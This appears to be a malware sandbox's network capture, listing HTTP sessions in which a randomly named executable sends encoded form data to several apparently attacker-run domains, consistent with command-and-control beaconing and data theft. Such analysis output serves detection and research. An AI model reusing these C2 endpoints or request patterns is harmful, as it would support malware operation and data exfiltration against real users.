                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.buyspeechst.shop
                                                                                    Referer: http://www.buyspeechst.shop/w98i/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 4b 68 6d 61 77 45 66 4e 54 55 35 47 55 33 6e 6c 4e 76 66 66 43 66 35 71 4a 33 61 6d 34 64 31 43 54 65 55 75 6c 4a 42 32 7a 46 6b 6e 49 7a 43 67 6b 4f 54 4e 4d 6b 4b 31 2b 69 58 4f 42 39 69 65 51 4a 51 52 31 61 47 6f 6e 75 35 2f 37 6f 35 4c 67 66 38 64 38 30 73 79 6e 2f 30 52 65 6e 49 68 32 74 6b 69 4c 71 45 6e 63 71 5a 52 4a 31 56 44 4a 62 69 43 43 75 58 58 6b 63 42 48 69 34 63 49 55 43 30 73 6e 42 57 45 77 6a 54 67 69 4f 2b 33 4d 55 57 51 71 66 32 2f 66 34 73 31 4d 66 41 6a 6c 2b 6b 7a 4b 79 62 35 50 37 33 6c 79 44 66 2b 6e 6e 79 74 2b 76 67 57 36 36 6d 59 70 46 79 67 6e 37 63 6c 52 30 57 46 31 73 3d
                                                                                    Data Ascii: 6B-l7F=ZdYnZ6+WLY4YYKhmawEfNTU5GU3nlNvffCf5qJ3am4d1CTeUulJB2zFknIzCgkOTNMkK1+iXOB9ieQJQR1aGonu5/7o5Lgf8d80syn/0RenIh2tkiLqEncqZRJ1VDJbiCCuXXkcBHi4cIUC0snBWEwjTgiO+3MUWQqf2/f4s1MfAjl+kzKyb5P73lyDf+nnyt+vgW66mYpFygn7clR0WF1s=
                                                                                    Jan 9, 2025 16:57:04.781955004 CET  854                IN         HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:04 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJO2FK9AJGTkAq99G%2Bdjq3Vc6cxrXhB42WFqvbhE%2FKlJ4a8w6zEPZf385%2BNpegU5X6Zhz%2FKLFEvlkcBqWt1L9RF72xBetg%2FLwZFAecHD23i%2BaCY5DCPjOYXo4IUl0pfkGdzzVHw9yg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59ef79e5810ed-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=118653&min_rtt=118653&rtt_var=59326&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                    Data Ascii: f
                                                                                    Jan 9, 2025 16:57:04.781964064 CET | 223 | IN | Data Raw: 64 39 0d 0a 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12
                                                                                    Data Ascii: d9Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_+
                                                                                    Jan 9, 2025 16:57:04.782109022 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    47 | 192.168.11.30 | 49872 | 104.21.32.180 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:07.165983915 CET | 3948 | OUT | POST /w98i/ HTTP/1.1
                                                                                    Host: www.buyspeechst.shop
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.buyspeechst.shop
                                                                                    Referer: http://www.buyspeechst.shop/w98i/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 4b 68 6d 61 77 45 66 4e 54 55 35 47 55 33 6e 6c 4e 76 66 66 43 66 35 71 4a 33 61 6d 34 56 31 65 77 57 55 73 43 56 42 31 7a 46 6b 38 6f 7a 44 67 6b 50 52 4e 4d 73 52 31 2b 6e 69 4f 44 31 69 4d 6a 52 51 41 52 4f 47 37 48 75 35 6a 4c 6f 38 50 67 66 70 64 36 55 6f 79 6e 76 30 52 65 6e 49 68 30 46 6b 6c 65 57 45 6c 63 71 57 62 70 31 4a 4a 70 61 39 43 47 4b 74 58 6b 49 52 48 68 59 63 4a 6e 36 30 73 52 31 57 45 77 6a 54 71 43 4f 37 33 4d 59 54 51 71 58 69 2f 65 78 52 31 39 37 41 6d 51 54 50 72 75 69 2b 69 2b 4c 4d 74 6d 54 41 31 6c 2f 79 71 63 66 48 66 4d 32 74 5a 5a 56 4e 73 6e 6e 6e 67 44 67 4b 47 6c 63 61 42 66 63 52 70 71 37 58 61 79 6a 31 66 58 69 45 55 48 48 76 6f 61 62 51 75 41 4b 61 39 76 59 42 2b 4e 69 77 7a 75 52 6c 52 53 36 43 33 77 4b 75 7a 6b 65 48 78 53 78 77 2b 54 45 44 4c 39 71 48 7a 50 62 52 4f 38 72 5a 58 53 61 71 51 4b 6c 52 78 41 55 48 2b 43 57 72 69 2f 50 66 52 42 71 6f 62 78 36 47 61 69 79 39 43 36 33 56 32 69 55 51 68 6b 75 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F= [TRUNCATED]
                                                                                    Jan 9, 2025 16:57:07.466294050 CET | 1057 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:07 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O4WYtCaLEnUX2VSFNq%2FqIwxr%2FeBLm8p6A2l8ta%2B%2FdYaAUOTCSygldZ%2B52CBVVBLmPxtND1Gd2YpygCyX%2FAHRf5fviTFOnUbf1OWkETVoqvdYbbirkwGf6qH5gaj97YSuHFRCOW5hYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59f082da1874f-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=118836&min_rtt=118836&rtt_var=59418&sent=2&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=3948&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a
                                                                                    Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_
                                                                                    Jan 9, 2025 16:57:07.466348886 CET | 16 | IN | Data Raw: 62 0d 0a e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a
                                                                                    Data Ascii: b+
                                                                                    Jan 9, 2025 16:57:07.466401100 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    48 | 192.168.11.30 | 49873 | 104.21.32.180 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:09.817972898 CET | 539 | OUT | GET /w98i/?6B-l7F=UfwHaNGeM7ohZqxLfFoMCRROWED3zeeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5VntXdX45GkikqbyqPY=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.buyspeechst.shop
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:57:10.238609076 CET | 1077 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:10 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCoKElnvZjL8eD3iYDX9OYPTFhsb14hFxTPkx%2BbLOw9KH5IsIzakScLCZd90t2O0akzI26K5JKnnGybcP8WLlCqDSUKk2XIyYIX0m9W2rRXNFHmakYfy9ZCm2C%2BGFl%2B7jfdUZGXihQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59f18cd10a49b-ORD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=119224&min_rtt=119224&rtt_var=59612&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 31 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 79 73 70 65 65 63 68 73 74 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                    Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.buyspeechst.shop Port 80</address></body></html>
                                                                                    Jan 9, 2025 16:57:10.238626003 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    49 | 192.168.11.30 | 49874 | 47.83.1.90 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:15.769455910 CET | 796 | OUT | POST /gcvb/ HTTP/1.1
                                                                                    Host: www.lejgnu.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.lejgnu.info
                                                                                    Referer: http://www.lejgnu.info/gcvb/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 63 31 68 32 58 53 44 4d 72 37 77 67 52 6e 70 6b 4d 35 5a 31 6c 38 49 41 6d 35 53 41 74 58 47 5a 43 4a 45 66 4b 65 70 61 33 56 4d 39 73 4b 31 44 75 50 6e 33 75 4f 71 6a 49 36 6e 41 63 71 36 5a 76 36 44 4e 41 48 6a 4d 69 61 4e 36 79 35 36 35 4c 62 75 41 2b 43 73 78 75 71 42 75 70 43 44 42 43 75 65 33 78 5a 4f 58 61 61 66 6c 65 69 54 44 51 53 2f 30 73 44 74 48 62 70 6e 32 79 31 6f 59 45 66 67 36 47 68 33 62 69 56 6c 6e 67 51 72 50 42 6b 7a 4e 58 51 6a 78 58 64 63 58 50 78 62 74 71 46 4d 44 69 30 4e 6d 6f 46 62 59 35 33 2f 66 78 46 78 61 58 6d 31 32 71 75 75 2f 74 52 50 74 76 51 3d 3d
                                                                                    Data Ascii: 6B-l7F=c1h2XSDMr7wgRnpkM5Z1l8IAm5SAtXGZCJEfKepa3VM9sK1DuPn3uOqjI6nAcq6Zv6DNAHjMiaN6y565LbuA+CsxuqBupCDBCue3xZOXaafleiTDQS/0sDtHbpn2y1oYEfg6Gh3biVlngQrPBkzNXQjxXdcXPxbtqFMDi0NmoFbY53/fxFxaXm12quu/tRPtvQ==
                                                                                    Jan 9, 2025 16:57:16.761316061 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:57:16 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    50 | 192.168.11.30 | 49875 | 47.83.1.90 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:18.625554085 CET | 816 | OUT | POST /gcvb/ HTTP/1.1
                                                                                    Host: www.lejgnu.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.lejgnu.info
                                                                                    Referer: http://www.lejgnu.info/gcvb/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 63 31 68 32 58 53 44 4d 72 37 77 67 51 45 78 6b 4b 5a 6c 31 69 63 49 44 73 5a 53 41 69 33 47 64 43 4f 4d 66 4b 61 77 58 33 47 34 39 76 76 52 44 74 4c 4c 33 70 4f 71 6a 63 71 6e 4a 53 4b 36 51 76 36 65 77 41 43 4c 4d 69 61 5a 36 79 37 53 35 4b 71 75 66 2b 53 73 4a 77 4b 42 37 74 43 44 42 43 75 65 33 78 5a 4b 74 61 61 58 6c 5a 54 6a 44 52 32 54 33 6b 6a 74 45 63 70 6e 32 67 46 6f 55 45 66 67 39 47 6a 43 4d 69 58 74 6e 67 51 37 50 50 57 62 4f 63 51 6a 33 50 39 64 54 47 42 36 70 68 6b 4d 78 78 55 42 76 6d 48 58 67 34 67 53 46 73 47 46 59 45 47 4a 62 32 76 44 58 76 54 4f 32 79 59 68 37 70 63 45 56 42 5a 7a 7a 4d 6f 35 70 48 33 6e 61 77 31 63 3d
                                                                                    Data Ascii: 6B-l7F=c1h2XSDMr7wgQExkKZl1icIDsZSAi3GdCOMfKawX3G49vvRDtLL3pOqjcqnJSK6Qv6ewACLMiaZ6y7S5Kquf+SsJwKB7tCDBCue3xZKtaaXlZTjDR2T3kjtEcpn2gFoUEfg9GjCMiXtngQ7PPWbOcQj3P9dTGB6phkMxxUBvmHXg4gSFsGFYEGJb2vDXvTO2yYh7pcEVBZzzMo5pH3naw1c=
                                                                                    Jan 9, 2025 16:57:19.623817921 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:57:19 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    51 | 192.168.11.30 | 49876 | 47.83.1.90 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:21.479825974 CET | 1289 | OUT | POST /gcvb/ HTTP/1.1
                                                                                    Host: www.lejgnu.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.lejgnu.info
                                                                                    Referer: http://www.lejgnu.info/gcvb/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 63 31 68 32 58 53 44 4d 72 37 77 67 51 45 78 6b 4b 5a 6c 31 69 63 49 44 73 5a 53 41 69 33 47 64 43 4f 4d 66 4b 61 77 58 33 48 41 39 76 5a 64 44 74 71 4c 33 6f 4f 71 6a 41 61 6e 45 53 4b 37 43 76 36 47 38 41 43 50 63 69 5a 68 36 39 34 71 35 4e 59 57 66 30 53 73 4a 34 71 41 63 70 43 43 44 43 75 75 7a 78 59 36 74 61 61 58 6c 5a 51 37 44 59 43 2f 33 70 44 74 48 62 70 6d 35 79 31 6f 34 45 66 6f 79 47 6a 57 63 69 56 39 6e 67 44 54 50 50 6a 76 4f 63 51 6a 33 51 64 64 6f 47 42 32 6f 68 6b 55 74 78 57 68 2f 6d 32 44 67 34 42 2f 30 39 57 56 42 51 33 39 33 77 50 50 31 67 79 79 2b 38 49 74 44 68 73 59 63 49 6f 37 74 50 63 70 75 63 69 37 39 74 7a 31 46 6b 41 4c 38 48 4b 6a 37 70 4a 76 6b 6c 4f 77 4a 61 6c 6f 35 51 57 6c 44 6b 4e 58 4e 77 62 68 4b 45 54 37 34 6a 35 53 64 4d 49 55 2b 62 61 65 38 32 2f 75 66 63 2f 75 37 45 73 70 65 4f 41 55 56 55 4d 65 75 44 45 7a 6e 52 32 4b 4f 6b 35 78 69 67 70 59 42 77 66 53 55 4c 6e 50 78 2b 50 6a 6b 58 6c 41 67 50 71 78 41 65 4f 76 4b 37 65 4a 6e 45 4e 46 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=c1h2XSDMr7wgQExkKZl1icIDsZSAi3GdCOMfKawX3HA9vZdDtqL3oOqjAanESK7Cv6G8ACPciZh694q5NYWf0SsJ4qAcpCCDCuuzxY6taaXlZQ7DYC/3pDtHbpm5y1o4EfoyGjWciV9ngDTPPjvOcQj3QddoGB2ohkUtxWh/m2Dg4B/09WVBQ393wPP1gyy+8ItDhsYcIo7tPcpuci79tz1FkAL8HKj7pJvklOwJalo5QWlDkNXNwbhKET74j5SdMIU+bae82/ufc/u7EspeOAUVUMeuDEznR2KOk5xigpYBwfSULnPx+PjkXlAgPqxAeOvK7eJnENFYNaBzAoeEpcTuzZThHdgA1us1yQJ5k3UPzTKBdTQLjftOAziSd+8e0aV/fBTOhC1aXK0iVODCrlXiQl0A4PO1AE5gAtxuP2PWSlLEZfcqelMKseR2rVxhAj/3SCji2sFgdNyh92gHQUA5luVDAQEHkq/WM0KrzBlPLYchXRcUBIaXapXATlnGW9cVY2q9MbiCibQU44K/L6h/xS+JjApF7eZy5NEq7H/ZXjJcYlihwHreGAglKyvEHL9N3qY73cPloOV5RmDFqQixjWSi64TrgEJKe6tSP9e6gYnsH3AKZbAyWCNWTKGw47E7uJTt5nZB19bTSceq+FlzraL+bdv5duootT4F/VjfvT+D
                                                                                    Jan 9, 2025 16:57:21.479873896 CET | 2644 | OUT | Data Raw: 32 73 42 56 36 6a 34 77 61 6d 37 68 4f 71 5a 6c 4a 44 68 67 68 6f 31 70 73 72 74 2b 77 50 59 31 2f 39 6b 68 45 31 77 4b 6e 73 73 62 77 75 47 68 52 63 53 77 75 7a 45 31 53 6b 79 44 56 58 2f 58 44 71 6c 32 48 46 59 4a 61 47 37 34 49 57 35 71 4c 41
                                                                                    Data Ascii: 2sBV6j4wam7hOqZlJDhgho1psrt+wPY1/9khE1wKnssbwuGhRcSwuzE1SkyDVX/XDql2HFYJaG74IW5qLApC4RnBWFlMDj4AzWeVlGKwg7/0haqil/zWE2x6qeT6981eZgj5O10YzCx3oVaAnuvRK3uZuSG8CKM9bJhVgm8ACquEXwUqy9SQoLkGZ+uGV0wFzDPJdp2rNdG7unjbDyUHymNw53pLMj8EIjl4GWtCP/KkJw1tB2z
                                                                                    Jan 9, 2025 16:57:22.481483936 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:57:22 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    52 | 192.168.11.30 | 49877 | 47.83.1.90 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:24.313226938 CET | 534 | OUT | GET /gcvb/?6B-l7F=R3JWUl3ivpsXcFtFFeliieQU9JuOkkLjcoMED/ZSuHZ0i4hSpIKzgOSsfpnIAqnHyqi+O0adg4Vr07jACry21CI+4oE0/hewEO2O8IWqeYD/JQ6qTGavsAY=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.lejgnu.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:57:25.324420929 CET | 139 | IN | HTTP/1.1 567 unknown
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:57:25 GMT
                                                                                    Content-Length: 17
                                                                                    Connection: close
                                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                                    Data Ascii: Request too large


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    53 | 192.168.11.30 | 49878 | 194.9.94.85 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:33.712259054 CET | 533 | OUT | GET /js1x/?80k=lRapCPMXgDk&6B-l7F=YzadGC6YqOgjY/9t8WEBSxHCudcKSJxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswOCkfsfu+tPWB6ee9FA= HTTP/1.1
                                                                                    Host: www.milp.store
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:57:33.953876972 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 09 Jan 2025 15:57:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/8.1.30
